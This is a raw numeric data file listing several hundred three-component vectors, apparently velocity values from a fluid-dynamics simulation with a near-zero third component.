(-0.00295595753966 -0.000771820138338 0)
(-0.00263923344081 -0.000707811338125 0)
(0.0181113000446 0.0378568974525 0)
(0.03806937581 0.0689122527637 0)
(0.0572999812187 0.0951421907655 0)
(0.0759557842833 0.116775595536 0)
(0.0938267163933 0.134338371182 0)
(0.110771271334 0.148294947532 0)
(0.126746530773 0.159071865309 0)
(0.141773827763 0.167080244252 0)
(0.155915299306 0.172705754005 0)
(0.169259612841 0.176297623358 0)
(0.181912420903 0.178164162017 0)
(0.193988979041 0.17857212274 0)
(0.205608561299 0.177748142146 0)
(0.216890705423 0.175881542388 0)
(0.227953093856 0.173127933015 0)
(0.238910822098 0.169613166302 0)
(0.249876827684 0.165437359238 0)
(0.260963265853 0.160678806931 0)
(0.272283656119 0.155397679623 0)
(0.283955705296 0.149639464181 0)
(0.296104810557 0.143438211677 0)
(0.308868318909 0.136819791586 0)
(0.322400634808 0.129805520413 0)
(0.336879207522 0.122416728344 0)
(0.352511271114 0.114681068743 0)
(0.369540907565 0.106641673404 0)
(0.388255491247 0.0983705734784 0)
(0.408989866362 0.0899881068806 0)
(0.432125249449 0.0816901505573 0)
(0.458080525272 0.0737855085222 0)
(0.487280620866 0.0667168986761 0)
(0.520242342752 0.0611887211959 0)
(0.55577162335 0.0582083930867 0)
(0.608036675001 0.059087983537 0)
(-2.90772758595e-05 -0.0020273495399 0)
(-6.53754274866e-05 -0.00196041027244 0)
(-0.000110823627058 -0.0019715559434 0)
(-0.000170288315719 -0.00203001370176 0)
(-0.000212808536875 -0.00196618022107 0)
(-0.000269709752967 -0.00198824975956 0)
(-0.000325383986322 -0.00199744637238 0)
(-0.00037312927227 -0.00187627309992 0)
(-0.000442121758522 -0.00187934304601 0)
(-0.000494903976672 -0.00176413305598 0)
(-0.000549844090908 -0.00171689892377 0)
(-0.000603146827073 -0.00179073228659 0)
(-0.000648012495568 -0.00180663254731 0)
(-0.00069155118347 -0.00174657264107 0)
(-0.000753348762533 -0.00173674800496 0)
(-0.000803456780025 -0.00173619734461 0)
(-0.000874241734421 -0.00172190290574 0)
(-0.000921860183113 -0.0016540594778 0)
(-0.000991816344769 -0.00166087709971 0)
(-0.00102158313889 -0.00158688631412 0)
(-0.00108279185931 -0.00156219781802 0)
(-0.00112986814341 -0.00151721046343 0)
(-0.00118843524633 -0.00147228321088 0)
(-0.00124800868796 -0.0014224399709 0)
(-0.0013398882338 -0.00138583011837 0)
(-0.00140926207591 -0.00130793205545 0)
(-0.00141941438878 -0.00121466119115 0)
(-0.00154371113402 -0.0012727589308 0)
(-0.00156158507859 -0.0012539986163 0)
(-0.00159048826384 -0.00119812358846 0)
(-0.00162497796397 -0.00114346941241 0)
(-0.00168259726662 -0.00110589321539 0)
(-0.00171386849665 -0.00105721988567 0)
(-0.00178181629478 -0.00102987711717 0)
(-0.00180494696198 -0.000978908362148 0)
(-0.00183917645985 -0.000933151238153 0)
(-0.00188730609539 -0.000878244282899 0)
(-0.00192810408398 -0.000777885045575 0)
(-0.00192906258745 -0.000606747535188 0)
(-0.00194195706819 -0.000431408316262 0)
(-0.00196949425618 -0.000319174452139 0)
(-0.00210644435492 -0.000290818766228 -5.45434050326e-29)
(-0.00212444705069 -0.000295598076325 0)
(-0.0020700935334 -0.000505992271216 0)
(-0.00219250194774 -0.000867355260928 0)
(0.00244288974893 0.0208612161895 0)
(0.0279422598018 0.0579014675581 0)
(0.0481224545444 0.088668053681 0)
(0.0673286809463 0.114150272759 0)
(0.0857767763183 0.134933971616 0)
(0.103255771964 0.151548693613 0)
(0.11968937275 0.164504309195 0)
(0.135082433016 0.174290090597 0)
(0.149489429773 0.181364320033 0)
(0.162999905004 0.186143865688 1.01800059527e-28)
(0.175725374297 0.188997693908 -9.74771422163e-29)
(0.187789172283 0.190245126081 0)
(0.199319224669 0.190157426601 0)
(0.21044308039 0.188961332521 0)
(0.221284858271 0.186843665374 0)
(0.231963822928 0.183956441688 0)
(0.242594292288 0.180422068029 0)
(0.253286601487 0.176338359709 0)
(0.264148883261 0.171783245461 0)
(0.275289474784 0.166819113882 0)
(0.286819829527 0.161496840721 0)
(0.298857883001 0.155859623886 0)
(0.311531862986 0.149946848863 0)
(0.324984518791 0.143798308663 0)
(0.339377648101 0.137459210752 0)
(0.35489660153 0.130986524627 0)
(0.371754121551 0.12445735659 0)
(0.39019237166 0.117980151168 0)
(0.410481435433 0.111709578103 0)
(0.432911069946 0.105865763191 0)
(0.457775547568 0.100758655469 0)
(0.48531853286 0.0968137946189 0)
(0.515872296393 0.0946227401836 0)
(0.548026892694 0.0948933688605 0)
(0.594497746787 0.0984669085513 0)
(-2.46429303564e-05 -0.00207969610497 0)
(-7.10157507594e-05 -0.00201239378598 0)
(-0.000120886061383 -0.00202559773556 0)
(-0.000171456098101 -0.00207102119232 0)
(-0.000213845965395 -0.00201481726715 0)
(-0.000264381627447 -0.00203879033128 0)
(-0.000315760991946 -0.00204654215065 0)
(-0.000365286726634 -0.00194238732693 0)
(-0.000424021241115 -0.00192529405644 0)
(-0.000489371651325 -0.00184582263594 0)
(-0.000541880755057 -0.00175486270499 0)
(-0.000595195559608 -0.00183248639634 0)
(-0.000636795554954 -0.00185600558444 0)
(-0.000688976730211 -0.00180701327207 0)
(-0.000748870879974 -0.00178339858775 0)
(-0.000795480482176 -0.00178902396687 0)
(-0.000867633342129 -0.00179861908741 0)
(-0.000903721034558 -0.00170825244978 0)
(-0.000964095137031 -0.00169533703053 0)
(-0.00100749955699 -0.00164573038313 0)
(-0.00107171949698 -0.00161741558739 0)
(-0.00112280372708 -0.00157432541347 8.37821883486e-29)
(-0.00121732820757 -0.00157353494471 -8.68934174356e-29)
(-0.00126656195004 -0.00151442115401 0)
(-0.00134312786062 -0.00146132845895 0)
(-0.00138443395421 -0.00135176317114 0)
(-0.00142328411496 -0.00126993080804 0)
(-0.00150713609886 -0.00128188004903 0)
(-0.0015790619821 -0.00130415778809 0)
(-0.00160134442035 -0.00124859163472 0)
(-0.00162975936107 -0.00118470433486 0)
(-0.00167381734628 -0.0011430501989 0)
(-0.00172395852017 -0.00110685683438 0)
(-0.00177793981571 -0.00106817713762 0)
(-0.00182395306208 -0.00101645144247 0)
(-0.00183615741063 -0.000959835575457 0)
(-0.00188193444126 -0.000912718367868 0)
(-0.00191194558089 -0.000813134068018 0)
(-0.00190418539233 -0.00063277731067 0)
(-0.00191561615634 -0.000466903078516 0)
(-0.00201076901783 -0.000420448524967 0)
(-0.00219576297599 -0.000436196710803 0)
(-0.00226290013158 -0.000460716279317 0)
(-0.0027914265331 -0.000705983206647 0)
(-0.00224703295207 -0.00107756835414 0)
(0.016932473401 0.0413770604679 0)
(0.0378671063933 0.0778096563647 0)
(0.0576468177236 0.108170070381 2.15025104508e-28)
(0.0766473351479 0.132877285223 0)
(0.0947015193266 0.152690238337 0)
(0.111658693966 0.168241841876 0)
(0.127485313226 0.180117981434 0)
(0.142221662115 0.188868665601 0)
(0.155954206431 0.1949943164 0)
(0.168798694297 0.198937873665 0)
(0.180886752944 0.201082507546 0)
(0.192355992739 0.201753172169 0)
(0.203343310093 0.201220825402 0)
(0.213980687759 0.1997081928 0)
(0.224392978259 0.197396225617 0)
(0.234697270708 0.194430681949 0)
(0.245003480692 0.190928461646 0)
(0.255415845272 0.186983483383 0)
(0.266035057787 0.182672020956 0)
(0.276960839523 0.178057519796 0)
(0.288294816236 0.173194999781 0)
(0.300143631417 0.168135218604 0)
(0.312622258493 0.162928820173 0)
(0.325857443141 0.157630724596 0)
(0.339991093666 0.15230503547 0)
(0.355183226062 0.147030752004 0)
(0.371613756559 0.141908578086 0)
(0.389481980781 0.137069091031 0)
(0.409002179079 0.132682451378 0)
(0.430392307079 0.128969500872 0)
(0.453857962112 0.126214074978 0)
(0.479531668772 0.124772462272 0)
(0.507643314963 0.125090378724 0)
(0.536674987531 0.127665361665 0)
(0.578233232311 0.132975054335 0)
(-2.30969891259e-05 -0.00212941012522 0)
(-7.26395646797e-05 -0.00206750267774 0)
(-0.000123798865291 -0.00207562581057 0)
(-0.000174912709088 -0.00211925075057 0)
(-0.000218161425079 -0.0020606272882 0)
(-0.000262260009016 -0.0020822483588 0)
(-0.000308847657858 -0.00209427456452 0)
(-0.000359892632818 -0.00200412914065 0)
(-0.000409082664959 -0.00196763722116 0)
(-0.000485140729347 -0.00193924036654 0)
(-0.000534875714683 -0.00179965710411 0)
(-0.000589723701559 -0.00186661354622 0)
(-0.00062636581087 -0.00190636879442 0)
(-0.0006908683598 -0.00188585368956 0)
(-0.000742490759138 -0.00182429691636 0)
(-0.000788937354544 -0.00183545693658 0)
(-0.000853896580858 -0.00185726538586 0)
(-0.000881788257251 -0.00176102578252 0)
(-0.00094334414771 -0.00174655772804 0)
(-0.000992735933742 -0.00170487565639 0)
(-0.00105455825993 -0.00167472146535 0)
(-0.00111209303775 -0.00163692014982 0)
(-0.00117653167975 -0.00159891325107 0)
(-0.00122942595231 -0.00154971927353 0)
(-0.00129527837426 -0.00150250806714 0)
(-0.00138974459374 -0.00145066881044 0)
(-0.00143298073271 -0.00134869320344 0)
(-0.00150896929355 -0.0013325621373 0)
(-0.0016229472847 -0.00136658122059 0)
(-0.0016300955283 -0.00129955291294 0)
(-0.00167995247178 -0.00124529065494 0)
(-0.00170493345098 -0.00118657471091 0)
(-0.00174220585931 -0.00114023054935 0)
(-0.00176194431565 -0.00108664969395 0)
(-0.00182830904264 -0.00104744380449 0)
(-0.00186254293823 -0.00098935971145 0)
(-0.0018944402639 -0.000933644035524 0)
(-0.00191187698241 -0.000843794434711 0)
(-0.00187446090537 -0.000666977943363 0)
(-0.00189005879232 -0.000508619735346 0)
(-0.00203712048942 -0.000498237267217 0)
(-0.00201159909707 -0.000529688363304 0)
(-0.0020980155636 -0.000720616994614 0)
(-0.00208757575784 -0.00139806260558 0)
(-0.00145080491305 0.0157350718147 0)
(0.0261261217395 0.062283186382 0)
(0.0466882790094 0.0981874357837 0)
(0.0663410239703 0.127588149609 -1.84435572101e-28)
(0.0850741581286 0.151268972816 0)
(0.102646378463 0.169950803994 1.30616433665e-28)
(0.11899424666 0.184330206979 0)
(0.134142143289 0.195064421668 0)
(0.148170302438 0.202755431649 0)
(0.161197025005 0.207937353737 0)
(0.173362184108 0.211071981883 0)
(0.184814229487 0.212550118414 0)
(0.195701148081 0.212696464408 0)
(0.206164715108 0.211776646968 0)
(0.216337300073 0.210005270482 0)
(0.226340631609 0.207554178393 0)
(0.236286031223 0.204560398707 0)
(0.246275698415 0.201133463763 0)
(0.256404695991 0.197361959155 0)
(0.266763354689 0.193319289866 0)
(0.277439895361 0.189068760803 0)
(0.288523152382 0.184668149903 0)
(0.300105355879 0.180173995399 0)
(0.312284963953 0.175645818178 0)
(0.32516950077 0.171150458832 0)
(0.338878235097 0.166766639334 0)
(0.353544318484 0.162589774962 0)
(0.369315706864 0.158736970284 0)
(0.386353776102 0.15535201627 0)
(0.404828293141 0.152610075206 0)
(0.42490583123 0.150721419003 0)
(0.446735668857 0.149933754612 0)
(0.470387752064 0.150529689049 0)
(0.496049009657 0.152827599367 0)
(0.522183407178 0.157146871077 0)
(0.559454010172 0.163669594115 0)
(-2.20689623735e-05 -0.00217467606049 0)
(-6.99645490259e-05 -0.00212072847576 0)
(-0.000123686476799 -0.00212175304886 0)
(-0.000178363864591 -0.00216834858122 0)
(-0.000219329341818 -0.00210416372545 0)
(-0.000258268293528 -0.00211709562846 0)
(-0.000301145269104 -0.00214049883516 1.15624873865e-29)
(-0.000358195348971 -0.00206154943304 -1.11177696614e-29)
(-0.000407563404235 -0.0020070114687 0)
(-0.000482808799013 -0.00204682588624 0)
(-0.00052093357535 -0.00185627096224 0)
(-0.000583837445953 -0.00189832801715 0)
(-0.000620087455266 -0.00195118276668 0)
(-0.000693202893951 -0.00198379819162 0)
(-0.000724246866156 -0.00186668776552 0)
(-0.000777871672239 -0.0018801570415 0)
(-0.000836235835312 -0.00190460050822 0)
(-0.000860270875859 -0.00181080452283 0)
(-0.000922298645088 -0.0018015467095 0)
(-0.000983726075023 -0.0017727254943 0)
(-0.00103409983416 -0.00172503630434 0)
(-0.00111618911863 -0.00173567078824 0)
(-0.00114716060244 -0.00165794927027 0)
(-0.00120408934458 -0.00161147458241 0)
(-0.00127137152358 -0.00157114621419 0)
(-0.00134842295295 -0.00151386372296 0)
(-0.00143002265208 -0.00144284154585 0)
(-0.00149493506794 -0.00139554943339 0)
(-0.00162323111539 -0.00141687249219 0)
(-0.00167740512479 -0.00136800926665 0)
(-0.00171503396527 -0.00129900388922 0)
(-0.0017762821257 -0.00124682218367 0)
(-0.00179856935856 -0.00118524360898 0)
(-0.00183695136561 -0.00113597412289 0)
(-0.00183330185223 -0.00106180709632 0)
(-0.00189119949368 -0.00101025717227 0)
(-0.00192298509058 -0.000941022140569 0)
(-0.00198109308162 -0.000869394582384 0)
(-0.00180682934556 -0.000690744623941 0)
(-0.00191746994697 -0.000606727558925 0)
(-0.00220976991194 -0.000580063982452 0)
(-0.00214162863818 -0.000492128609012 0)
(-0.00180721737809 -0.000503788684226 0)
(-0.00168177311896 -0.00155687699237 0)
(0.0109380289937 0.0400847356646 0)
(0.0344761135279 0.082842061335 0)
(0.0550244641699 0.118241918087 0)
(0.0743913508335 0.14666857027 0)
(0.092639826306 0.169176077826 0)
(0.109603626204 0.186604068481 -1.20318481139e-28)
(0.12525881732 0.199733392274 0)
(0.13967165016 0.20928925898 1.00371810591e-28)
(0.15295958714 0.215918670906 0)
(0.165269603071 0.220181340401 0)
(0.176761651649 0.222550066273 0)
(0.18759659262 0.223416229213 0)
(0.197928271259 0.223098232129 0)
(0.207898957065 0.221851427075 0)
(0.217637333303 0.219878430295 0)
(0.227258340692 0.217339072843 0)
(0.236864302354 0.214359534923 0)
(0.246546864732 0.211040436416 0)
(0.256389381433 0.207463823713 0)
(0.266469457489 0.203699131207 0)
(0.276861474137 0.19980831088 0)
(0.28763902659 0.195850399252 0)
(0.298877304967 0.191885804053 0)
(0.310655494493 0.187980532617 0)
(0.323059234571 0.184210460913 0)
(0.336183045922 0.180665582876 0)
(0.350132414449 0.177454009331 0)
(0.365024940925 0.174705320976 0)
(0.380989576025 0.172572703878 0)
(0.398162821048 0.171233152975 0)
(0.4166789849 0.170884741132 0)
(0.436659948652 0.171740330425 0)
(0.458153403741 0.174015008543 0)
(0.48134920053 0.177914558309 0)
(0.504751668287 0.183604944713 0)
(0.538176846744 0.191025226707 0)
(-2.16501402094e-05 -0.00221814149797 0)
(-6.8676857845e-05 -0.00217282069178 0)
(-0.000126897351153 -0.00218536793977 0)
(-0.000179175787199 -0.00221516641121 0)
(-0.000213122817691 -0.00214649821696 0)
(-0.000251138444852 -0.00214902488948 0)
(-0.000292487409579 -0.00218648818341 0)
(-0.000354872327593 -0.00214033092318 0)
(-0.00040534837581 -0.00203822571544 0)
(-0.000463662058885 -0.00208008273867 0)
(-0.000504962721001 -0.00192579680466 0)
(-0.000572981531431 -0.00193312608196 0)
(-0.000614347390561 -0.00199289142892 0)
(-0.000672712357192 -0.00203356285624 0)
(-0.000696368397325 -0.00191437253974 0)
(-0.000758358589469 -0.00192699505591 0)
(-0.000810619005634 -0.00194313391966 0)
(-0.000839727186853 -0.00186019586432 0)
(-0.000900598211741 -0.0018532794376 0)
(-0.000977104255299 -0.00186323409845 0)
(-0.00100590403438 -0.00177309012926 0)
(-0.00107804125188 -0.00177455129438 0)
(-0.00111200534829 -0.00171259928573 0)
(-0.00117967070841 -0.00167965404688 0)
(-0.00124412989047 -0.00164320163332 0)
(-0.00131055102923 -0.00159371434842 0)
(-0.00139365112981 -0.00153545010723 0)
(-0.00147236425989 -0.0014844310557 0)
(-0.00153562633678 -0.00144586138144 0)
(-0.00170080605494 -0.00147255051141 0)
(-0.00173119923371 -0.00137449476132 0)
(-0.00179597142286 -0.00130119738174 0)
(-0.00182030248754 -0.00121517147039 0)
(-0.0018934607565 -0.00117637720438 0)
(-0.00191959681202 -0.00110892651166 0)
(-0.00193712019357 -0.00102694348322 0)
(-0.00195665461225 -0.000937345688958 0)
(-0.00210112373313 -0.000863988946016 0)
(-0.0018204572815 -0.000695127268523 0)
(-0.00198377853134 -0.000783074218612 0)
(-0.00223693598064 -0.000816437245871 0)
(-0.00273589332163 -0.000956512644019 0)
(-0.00272822241856 -0.00149828383873 0)
(-0.00774240078897 0.00119833192456 0)
(0.0223723499932 0.0617211440124 0)
(0.0424818986182 0.103649725834 0)
(0.0625769097046 0.138007604009 0)
(0.08162494029 0.165293007186 0)
(0.0992961570018 0.186490534429 0)
(0.115558926631 0.202564502799 0)
(0.130458507407 0.214392167766 0)
(0.14410173888 0.222759082488 -9.55115252946e-29)
(0.156638984886 0.228347586704 8.93182583802e-29)
(0.168241421678 0.231733910323 0)
(0.179084221438 0.233393563848 0)
(0.189335660666 0.23371132146 0)
(0.199150637969 0.232993396259 0)
(0.208667534031 0.231480280365 0)
(0.218007517516 0.22935921178 0)
(0.227275507 0.226775616862 0)
(0.236562148292 0.223843185988 0)
(0.245946309754 0.220652462106 0)
(0.255497714743 0.217277987814 0)
(0.265279443088 0.213784203154 0)
(0.275350168587 0.210230414402 0)
(0.285766153226 0.20667522611 0)
(0.296583151573 0.203180802748 0)
(0.307858439211 0.199817189927 0)
(0.31965313371 0.196666707056 0)
(0.332034827837 0.193828171756 0)
(0.345080323398 0.191420472203 0)
(0.358877995965 0.189584784299 0)
(0.373528947192 0.188484501739 0)
(0.389146063813 0.18830177883 0)
(0.405847993007 0.189229217903 0)
(0.423754440508 0.19145572135 0)
(0.442926369847 0.195144297458 0)
(0.463598105541 0.200406050687 0)
(0.484364670851 0.207272017885 0)
(0.514308780706 0.215450587885 0)
(-2.16262810969e-05 -0.00226349180583 0)
(-7.57007471308e-05 -0.00222625062761 0)
(-0.000135608385291 -0.0022558570429 0)
(-0.000170699859421 -0.00225494958323 0)
(-0.000198985217916 -0.00218860024931 0)
(-0.000243488194957 -0.00219390441431 0)
(-0.000286086659214 -0.00223030276168 0)
(-0.000342237424442 -0.00222058346506 0)
(-0.000391302544943 -0.00208821461534 0)
(-0.000444707903203 -0.00210899672019 0)
(-0.00049763849842 -0.00201560976103 0)
(-0.000557658420972 -0.00196859078368 0)
(-0.000602388769577 -0.0020324376379 0)
(-0.000642778071336 -0.00206127455224 0)
(-0.000671363206848 -0.00196755025908 0)
(-0.000733693598741 -0.00197368774154 0)
(-0.000776896728028 -0.00197178242985 0)
(-0.000820391125897 -0.00191700914655 0)
(-0.000878572871528 -0.00190007482483 0)
(-0.00093976266506 -0.00190814136708 0)
(-0.000968405154229 -0.00182619025918 0)
(-0.0010325814335 -0.0018134733767 0)
(-0.00107733710992 -0.00177122778643 0)
(-0.00115278003023 -0.00175397469585 -7.03105005103e-29)
(-0.00119407420285 -0.00169600208542 6.80327741169e-29)
(-0.0012644674355 -0.00166384764364 0)
(-0.00133256991609 -0.00161365193558 0)
(-0.00140868027917 -0.00156367351542 0)
(-0.00145653244656 -0.00150288473258 0)
(-0.00155345194302 -0.00149296160952 0)
(-0.00171872596696 -0.00149861120876 0)
(-0.00174546483766 -0.00136389156364 0)
(-0.00186731779882 -0.00130849695172 0)
(-0.00189624518205 -0.00120974105187 0)
(-0.00196446281677 -0.00113917506523 0)
(-0.00202901633334 -0.00106678362202 0)
(-0.00208570747741 -0.000970968080737 0)
(-0.00217411171585 -0.000844318273772 0)
(-0.00236386560438 -0.000815061110598 0)
(-0.00198332377821 -0.000787664336606 0)
(-0.00194088627314 -0.000909519251522 0)
(-0.00197947241581 -0.00123332355191 0)
(-0.00179676003277 -0.00222914309642 0)
(0.0029372354804 0.0283733070772 0)
(0.0295664786052 0.0820125099325 0)
(0.0500337808469 0.124084113993 0)
(0.0695660958916 0.157361855121 0)
(0.0880262194061 0.183331248208 0)
(0.10501460887 0.203108013621 0)
(0.120511722112 0.217764332946 0)
(0.134616563036 0.22826930497 0)
(0.147477702012 0.235462375809 0)
(0.159274344575 0.240051721667 -8.61295846581e-29)
(0.17019631585 0.242620554841 0)
(0.180428463944 0.243638662822 -7.84284681294e-29)
(0.190141204086 0.243477231147 0)
(0.199485710046 0.24242484794 0)
(0.208592385749 0.240703175001 0)
(0.217571559342 0.238481354723 0)
(0.226515528285 0.235888657401 0)
(0.235501276834 0.233025178702 0)
(0.244593358357 0.229970599168 0)
(0.253846567658 0.226791175656 0)
(0.263308164731 0.223545299918 0)
(0.273019593161 0.220288114969 0)
(0.283017849122 0.217075749764 0)
(0.293336832442 0.213969649393 0)
(0.304009075788 0.211041238136 0)
(0.315068172162 0.208376819836 0)
(0.326552034998 0.20608227931 0)
(0.338506882563 0.204286854984 0)
(0.350991630115 0.20314501023 0)
(0.364082046661 0.202835155105 0)
(0.377874186091 0.203553739147 0)
(0.392484113325 0.205502533009 0)
(0.408051017661 0.208867400665 0)
(0.424683612408 0.213785484758 0)
(0.442704184621 0.220297601702 0)
(0.460858110851 0.228321088445 0)
(0.487652503803 0.23730102285 0)
(-2.31139360966e-05 -0.00231053142212 0)
(-8.44869335753e-05 -0.00230687327387 0)
(-0.000133579617199 -0.00229663425552 0)
(-0.000152911339955 -0.00226146937691 0)
(-0.000186875955496 -0.00223105603621 0)
(-0.0002371172411 -0.00223969988557 0)
(-0.000280510953811 -0.0022688804315 0)
(-0.000325389961337 -0.00227037552609 8.58242129901e-29)
(-0.000376162608952 -0.00216007096903 0)
(-0.000424689074043 -0.00214335428074 0)
(-0.000486816269964 -0.00210085214437 0)
(-0.000539890477822 -0.00200432673288 0)
(-0.000586823886325 -0.00206567916798 0)
(-0.00061518659352 -0.00208745491773 0)
(-0.0006568538095 -0.00202503961976 0)
(-0.000712127468098 -0.0020128329019 0)
(-0.000751241659417 -0.00201868788833 0)
(-0.000801504678186 -0.0019748721177 0)
(-0.000853204540334 -0.00194005978039 0)
(-0.000898725521266 -0.00193663777291 0)
(-0.000936405708184 -0.00188144369113 0)
(-0.000993373375327 -0.00186116534291 0)
(-0.00104630821945 -0.00183112286571 0)
(-0.00110239639472 -0.00179311795628 0)
(-0.00114978823197 -0.00175513596214 0)
(-0.00122854199653 -0.00175124652201 0)
(-0.00127040775038 -0.00168731276989 0)
(-0.00133667682717 -0.00164489037474 0)
(-0.00140382192254 -0.00160020776159 0)
(-0.00143091865875 -0.00152498453987 0)
(-0.00153653576711 -0.00152304339131 0)
(-0.00172218128984 -0.00153892826479 0)
(-0.00181224951405 -0.00141973480762 0)
(-0.00194012912081 -0.00133427509751 0)
(-0.00205379461981 -0.00125712029766 0)
(-0.00216473971695 -0.00117926416989 0)
(-0.00228296872621 -0.00109423703658 0)
(-0.00240296763243 -0.00097877684794 0)
(-0.00265479436432 -0.00084903680277 0)
(-0.00268737291115 -0.000736047147762 0)
(-0.00216992078496 -0.00072859953163 0)
(-0.00164629265068 -0.000830706741315 0)
(-0.00157958901229 -0.00173022863696 0)
(0.011173070556 0.0512294327417 0)
(0.0357812840182 0.102870152808 0)
(0.0565642403883 0.144206280067 0)
(0.0757634338424 0.176236107399 0)
(0.0935549449266 0.200713019321 0)
(0.109782076125 0.218963755187 0)
(0.12447374106 0.232163270818 0)
(0.137770743359 0.241351566208 0)
(0.149859699497 0.247409095535 0)
(0.160944616668 0.251059052232 0)
(0.171228358853 0.25288170807 0)
(0.180899691065 0.253332771189 7.65997895526e-29)
(0.190125937885 0.252763336727 7.30363183885e-29)
(0.199050121264 0.251439663772 0)
(0.20779116106 0.24956144618 0)
(0.216445942908 0.247277826421 0)
(0.225092326935 0.244700869766 0)
(0.233792419884 0.241916500512 0)
(0.24259561735 0.238993060344 0)
(0.251541055761 0.235987797201 0)
(0.260659277943 0.232951801133 0)
(0.269973168134 0.229934110649 0)
(0.279498506531 0.226985775854 0)
(0.289244709818 0.22416448715 0)
(0.299216362182 0.221539988949 0)
(0.3094159923 0.219200028819 0)
(0.319848301741 0.217256181759 0)
(0.330525805632 0.215848601871 0)
(0.34147575103 0.215148549747 0)
(0.352747976751 0.2153572538 0)
(0.364423980833 0.216699344606 0)
(0.376624501957 0.219407786194 0)
(0.389524118819 0.223697928129 0)
(0.403313148409 0.229723469835 0)
(0.418447633777 0.237500973887 0)
(0.433921811844 0.246882642354 0)
(0.457869458549 0.256948946814 0)
(-2.31288227547e-05 -0.00235641005536 0)
(-7.13324207364e-05 -0.00235963926181 0)
(-0.000114469231529 -0.00227220917336 0)
(-0.000150811272773 -0.00227494989828 0)
(-0.000187886605506 -0.00227534980428 0)
(-0.000234201478647 -0.00228566772484 0)
(-0.00027271499077 -0.00230238680314 0)
(-0.000311693749869 -0.00231025172337 -8.40736140397e-29)
(-0.000363472474469 -0.00222303327756 0)
(-0.000408437472067 -0.0021717949413 0)
(-0.000475029515843 -0.00220137667068 -7.93381737352e-29)
(-0.000521985409123 -0.00205664452094 0)
(-0.000574326678936 -0.00208986138438 0)
(-0.000598768670783 -0.00212908385733 0)
(-0.000652767356111 -0.00210218709083 0)
(-0.000696050410214 -0.00204221323875 0)
(-0.000735383139346 -0.00206172301914 0)
(-0.000793886092064 -0.00206843344079 0)
(-0.000821457202104 -0.00197783600616 0)
(-0.000869623010569 -0.00197891886844 0)
(-0.000914653311709 -0.00193724288619 0)
(-0.000958862226364 -0.00189970451791 0)
(-0.00102517459734 -0.00191605806791 0)
(-0.00104680418575 -0.00183474232335 0)
(-0.00110744035876 -0.00181105874116 0)
(-0.0011524237034 -0.00177658127522 0)
(-0.00120161485135 -0.00174068856268 0)
(-0.00126290402132 -0.00171023761256 0)
(-0.00132089630578 -0.00167124618278 0)
(-0.00137926749018 -0.00163273101463 0)
(-0.00141206770407 -0.00157302968124 0)
(-0.0015111222592 -0.00156470112672 0)
(-0.00164640274913 -0.00155341965105 0)
(-0.00182345672504 -0.00151737154766 0)
(-0.00197173268643 -0.00144123213532 0)
(-0.00211705205985 -0.00136090732805 0)
(-0.00223508338394 -0.00126733056549 0)
(-0.00236963905257 -0.00117991050555 0)
(-0.00261681768322 -0.00108326439175 0)
(-0.00282821786461 -0.000877534765349 0)
(-0.00338699857642 -0.000915261512439 0)
(-0.00281524175347 -0.00129673284064 0)
(-0.00833687870365 2.29751160887e-05 0)
(0.0220468820834 0.0733731322371 0)
(0.0422664799472 0.123835268865 0)
(0.0623880271154 0.163846001444 0)
(0.081136784387 0.194461598679 0)
(0.098203085444 0.217347148656 0)
(0.113613767681 0.234010382235 0)
(0.127477882604 0.245743745832 0)
(0.139974713291 0.253647170985 0)
(0.151320776627 0.258628082234 0)
(0.161738519557 0.261412926751 0)
(0.171437770734 0.262569188507 0)
(0.180605488748 0.262530687415 0)
(0.189401035786 0.261622763972 -7.17236701762e-29)
(0.19795549173 0.260085633173 6.84738358268e-29)
(0.206373594059 0.258094875179 0)
(0.214737055362 0.255778604471 0)
(0.223108329159 0.253231317179 0)
(0.231534189855 0.250524638146 0)
(0.240048663796 0.247715273582 0)
(0.248674962459 0.244850625734 0)
(0.257426276057 0.24197282478 0)
(0.266305648192 0.239122223904 0)
(0.275305551805 0.236341435153 0)
(0.284408022024 0.233680640435 0)
(0.293586148589 0.231204304689 0)
(0.302807439397 0.228998798641 0)
(0.312039219277 0.227180015608 0)
(0.321256009778 0.225899897431 0)
(0.330448953099 0.225350738281 0)
(0.339637392737 0.22576590684 0)
(0.348884172268 0.227415175703 0)
(0.358312364362 0.230590669328 0)
(0.368136338072 0.235580756235 0)
(0.378651514536 0.242615560725 0)
(0.390481959309 0.251774625895 0)
(0.403063798585 0.262952942373 0)
(0.424342983744 0.2747341093 0)
(-2.15231826267e-05 -0.00240134979116 0)
(-5.77254577752e-05 -0.00239560905901 0)
(-0.000106782331375 -0.00237942723511 0)
(-0.000155265542707 -0.00232179236781 0)
(-0.000189646870493 -0.0023223870315 0)
(-0.000226465889167 -0.0023293849788 0)
(-0.000259776809031 -0.00233127311731 0)
(-0.000296839908177 -0.00235042226169 0)
(-0.000349959551406 -0.00227929939751 0)
(-0.000401092831255 -0.0022079537774 0)
(-0.000453098402491 -0.00224118545528 7.81001658934e-29)
(-0.00050743470211 -0.00213553291367 0)
(-0.000563309867519 -0.0021073876595 0)
(-0.00059248209468 -0.00216149558097 0)
(-0.000644364062984 -0.00219064175623 -7.5470306156e-29)
(-0.000671451059232 -0.00207869842845 0)
(-0.000719544609813 -0.00209309682844 0)
(-0.000761651420656 -0.00210650472093 0)
(-0.000789223039879 -0.00202301782405 0)
(-0.000840772865996 -0.00201865378768 0)
(-0.000898189282461 -0.00202343464987 0)
(-0.00091682793369 -0.00192995422044 0)
(-0.000970845252553 -0.001935832017 0)
(-0.000999281369958 -0.00188813282122 0)
(-0.00105989002822 -0.00187097349432 0)
(-0.00109055406579 -0.00181949496128 0)
(-0.00114523175518 -0.00179539278337 0)
(-0.00119362290458 -0.00176567298615 0)
(-0.00124307494192 -0.00172891643768 0)
(-0.00129428696879 -0.00169586888169 0)
(-0.0013496657601 -0.00167611286393 0)
(-0.00136640321007 -0.00161234025832 0)
(-0.00142125325848 -0.00158038370515 0)
(-0.00149477351664 -0.00154455799411 0)
(-0.00157332808711 -0.00147677682054 0)
(-0.00165724860194 -0.00139359073711 0)
(-0.00174747456386 -0.00131728829222 0)
(-0.00183929788899 -0.00125919028956 0)
(-0.00196426919025 -0.00119967577648 0)
(-0.00187324358255 -0.00109548963099 0)
(-0.00235794922913 -0.00157339541817 0)
(-0.0024283153793 -0.00299477605571 0)
(0.000977995358858 0.025878450343 0)
(0.0281580776927 0.0935400117378 0)
(0.0483173908758 0.14424036504 0)
(0.0676423520223 0.182930192169 0)
(0.0856760471986 0.211963315666 0)
(0.101955387891 0.233176561394 0)
(0.116529029114 0.248226130943 0)
(0.129569064499 0.258512427541 0)
